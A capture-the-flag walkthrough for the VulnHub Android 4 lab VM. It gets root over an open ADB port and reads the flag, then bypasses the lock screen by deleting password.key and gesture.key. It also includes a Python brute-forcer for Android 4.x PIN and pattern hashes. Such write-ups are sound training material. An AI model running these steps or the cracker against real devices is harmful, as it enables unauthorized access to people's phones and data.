CTF · Vulnhub

Android 4: 1

Setting up the VulnHub machine:

  1. First, download the VM image from VulnHub (https://www.vulnhub.com/entry/android4-1,233/).
  2. Open VirtualBox, click Import, and select the downloaded file.
  3. Once the import succeeds, configure the VM's network interface so that the target sits on the same network as your attacking machine. That is what makes the enumeration phase work.
  4. Finally, check that the Network Adapter is set to Host-only Adapter (the same host-only network your Kali VM uses).

Once the settings are done, start the virtual machine.

The instance boots to a lock screen that asks us for a password.

Our task is to find the flag and, afterwards, to get past that lock screen.

The Walkthrough: – 

Step 1:- (Enumeration) 

The instances are ready and we are on Kali Linux. Let's find the IP address of the target Android VM with netdiscover, listening on the host-only interface:

┌──(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0

We have discovered an IP address, so let's run a port scan to find out which ports are open. This is an essential part of the enumeration process: it shows us the attack surface and lets us design targeted attacks. As in most cases, we use the well-known Nmap tool.

  • -sC: runs the default set of NSE scripts against each open port.
  • -sV: enables version detection, which tries to identify the service and version running on each port.

┌──(rootharsh㉿kali)-[~]
└─$ nmap -sC -sV 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 12:25 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.109
Host is up (0.00053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
5555/tcp open  freeciv?
8080/tcp open  http     PHP cli server 5.5 or later
|_http-title: Deface by Good Hackers
|_http-open-proxy: Proxy might be redirecting requests

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.68 seconds
                                                                                                      
┌──(rootharsh㉿kali)-[~]
└─$

From the network scan, we have spotted 2 open ports.

  • Port 5555/TCP is reported as "freeciv?". The trailing question mark means the service probe was inconclusive, so this label is a guess from Nmap's port table, not an identified Freeciv game server. We will come back to this port.
  • Port 8080/TCP runs an HTTP service (PHP's built-in CLI web server), which indicates that there is a website running.

To look at the website ourselves, open a web browser and navigate to http://192.168.56.109:8080.

Step 2:- (Foothold)

The page looks like it accepts form input via the POST method, so we tried tampering with the request parameters, but found nothing useful; it appears to be a static information page. Let's brute-force directories and file names with gobuster.

┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.109:8080 -w /usr/share/wordlists/dirb/common.txt  

Gobuster finds nothing either. Back to the Nmap result: port 5555/TCP is the default port the Android Debug Bridge daemon (adbd) listens on when debugging over TCP is enabled, and the target is an Android VM, so it is very likely that we can connect to the device with the ADB command-line utility. If you are not familiar with ADB, see https://developer.android.com/studio/command-line/adb.

First, open a terminal and check whether the ADB command-line utility is already installed. If not, install it:

┌──(rootharsh㉿kali)-[~]
└─$ sudo apt-get install adb

To connect to the Android device over the network:

┌──(rootharsh㉿kali)-[~]
└─$ adb connect 192.168.56.109:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.56.109:5555
                                                                                                                                                                                                                                       
┌──(rootharsh㉿kali)-[~]
└─$

On success, list the connected devices with adb devices. The state column shows device rather than unauthorized, which means adbd accepted our connection without the RSA-key authorization prompt a stock device would show. We now have a foothold on the device.

┌──(rootharsh㉿kali)-[~]
└─$ adb devices
List of devices attached
192.168.56.109:5555     device

                                                                                                
┌──(rootharsh㉿kali)-[~]
└─$ 

To interact with the device, use adb shell; from there you can run ordinary Linux commands to look for the flag. The shell user (uid 2000) is unprivileged, but su is available and drops us into a root shell without asking for a password:

┌──(rootharsh㉿kali)-[~]
└─$ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcar
uid=2000(shell) gid=2000(shell)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ #

Step 3:- (Privilege Escalation)

Privilege escalation on this image needed no exploit: su granted root to the shell user with no password. With the highest privilege we can read the root flag and complete the challenge.

uid=0(root) gid=0(root)@x86:/ # cd /data/root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
ANDROID{u_GOT_root_buddy}
uid=0(root) gid=0(root)@x86:/data/root #

Congratulations on capturing the flag. Let's see whether we can also remove the lock screen password using ADB. Go back up to the /data directory, then into /data/system, which is where Android keeps its lock screen settings, and list it:

uid=0(root) gid=0(root)@x86:/data/root # cd ..
uid=0(root) gid=0(root)@x86:/data # cd system
uid=0(root) gid=0(root)@x86:/data/system # ls
appops.xml
batterystats.bin
called_pre_boots.dat
device_policies.xml
dropbox
entropy.dat
framework_atlas.config
gesture.key
ifw
inputmethod
locksettings.db
locksettings.db-shm
locksettings.db-wal
ndebugsocket
netstats
packages.list
packages.xml
password.key
procstats
registered_services
shared_prefs
sync
uiderrors.txt
usagestats
users
uid=0(root) gid=0(root)@x86:/data/system # 

The lock screen credential hashes are the files with the ".key" extension: password.key holds the hash of a PIN or password, and gesture.key holds the hash of an unlock pattern. The locksettings.db next to them stores the related settings, including the salt that goes into password.key. On Android 4.x the password.key value is SHA-1(password + salt) followed by MD5(password + salt), both as uppercase hex, which is why the string printed below is 72 characters long: it is a salted hash, not the password itself.
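Deleting the key files (as done next) is destructive: the credential is gone rather than recovered. A non-destructive alternative is to pull password.key and locksettings.db off the device and crack the PIN offline. The code below is an added example for this walkthrough, not code from the original post or the Android project; it reimplements the Android 4.x hashing (LockPatternUtils.passwordToHash for password.key, unsalted SHA-1 over cell indices for gesture.key) and brute-forces numeric PINs and unlock patterns. The salt for the target is inside locksettings.db, which the post never dumps, so the demo uses a constructed salt, PIN and pattern (all assumptions) and an in-memory stand-in for the pulled database; only the 72-character format of the page's password.key value is taken from the page.

```python
import hashlib
import itertools
import sqlite3

SALT_KEY = "lockscreen.password_salt"   # row name in locksettings.db (Android 4.x)
MIN_PATTERN_DOTS = 4                    # Android's minimum unlock-pattern length


def salt_to_hex(salt: int) -> str:
    """Android renders the salt with Long.toHexString: lowercase, no leading
    zeros, and a negative long appears as its 16-digit two's-complement form."""
    return format(salt & 0xFFFFFFFFFFFFFFFF, "x")


def password_key_hash(password: str, salt: int) -> str:
    """Reproduce LockPatternUtils.passwordToHash (Android 4.x): SHA-1 then MD5
    of password+salt, uppercase hex, i.e. the 72 characters in password.key."""
    salted = (password + salt_to_hex(salt)).encode("utf-8")
    return (hashlib.sha1(salted).hexdigest() + hashlib.md5(salted).hexdigest()).upper()


def gesture_key_hash(pattern) -> bytes:
    """gesture.key is the raw, unsalted SHA-1 over the visited cell indices
    (0..8, row-major) in the order they were drawn."""
    return hashlib.sha1(bytes(pattern)).digest()


def read_salt(conn: sqlite3.Connection) -> int:
    """Read the salt from a locksettings.db opened with sqlite3 (e.g. after adb pull)."""
    row = conn.execute("SELECT value FROM locksettings WHERE name = ?", (SALT_KEY,)).fetchone()
    if row is None:
        raise LookupError(f"{SALT_KEY} not present; the device may use a pattern, not a PIN")
    return int(row[0])


def crack_password_key(target_hash: str, salt: int, min_len: int = 4, max_len: int = 6):
    """Brute-force numeric PINs of min_len..max_len digits against a password.key value."""
    target = target_hash.strip().upper()
    if len(target) != 72:
        raise ValueError("password.key should hold 72 hex characters (SHA-1 + MD5)")
    for length in range(min_len, max_len + 1):
        for digits in itertools.product("0123456789", repeat=length):
            candidate = "".join(digits)
            if password_key_hash(candidate, salt) == target:
                return candidate
    return None


def crack_gesture_key(target_digest: bytes):
    """Enumerate every ordered choice of 4..9 distinct cells. Real patterns obey
    extra adjacency rules, so this search space is a superset and cannot miss."""
    for length in range(MIN_PATTERN_DOTS, 10):
        for cells in itertools.permutations(range(9), length):
            if gesture_key_hash(cells) == target_digest:
                return cells
    return None


def sample_locksettings_db(salt: int) -> sqlite3.Connection:
    """CONSTRUCTED stand-in for a pulled locksettings.db using the 4.x schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE locksettings (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
                 "name TEXT, user INTEGER, value TEXT)")
    conn.execute("INSERT INTO locksettings (name, user, value) VALUES (?, 0, ?)",
                 (SALT_KEY, str(salt)))
    conn.commit()
    return conn


if __name__ == "__main__":
    # Constructed demo values (assumptions), not anything taken from the target.
    demo_salt = -6174389542113254143          # a Java long as the device would store it
    demo_conn = sample_locksettings_db(demo_salt)
    demo_key = password_key_hash("2580", read_salt(demo_conn))
    print("password.key:", demo_key)
    print("recovered PIN:", crack_password_key(demo_key, read_salt(demo_conn)))
    print("recovered pattern:", crack_gesture_key(gesture_key_hash([0, 4, 8, 5])))
```

To use it against a real 4.x image, adb pull /data/system/password.key and /data/system/locksettings.db, open the database with sqlite3.connect, and pass the file's contents and read_salt(conn) to crack_password_key. Alphanumeric passwords need a wordlist instead of the digit product; the hash function is the same.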

uid=0(root) gid=0(root)@x86:/data/system # cat password.key
68683BEA625263C8F04CBBC88D13233FBD2B6B875C707BC04B48AD1AD1733F739969F9D7uid=0(root) gid=0(root)@x86:/data/system # rm *.key 
uid=0(root) gid=0(root)@x86:/data/system # 

The key files are removed. The lock screen decides whether a credential exists by looking for these files, so once they are gone it has nothing to check against. Reboot the device to see the effect:

uid=0(root) gid=0(root)@x86:/data/system # reboot

After the reboot the device no longer asks for a password: we have successfully bypassed the lock screen. Keep in mind that this only works because we already have a root shell over an unauthenticated ADB connection; on a device with ADB disabled, or with ADB key authorization enforced, none of this would be reachable.
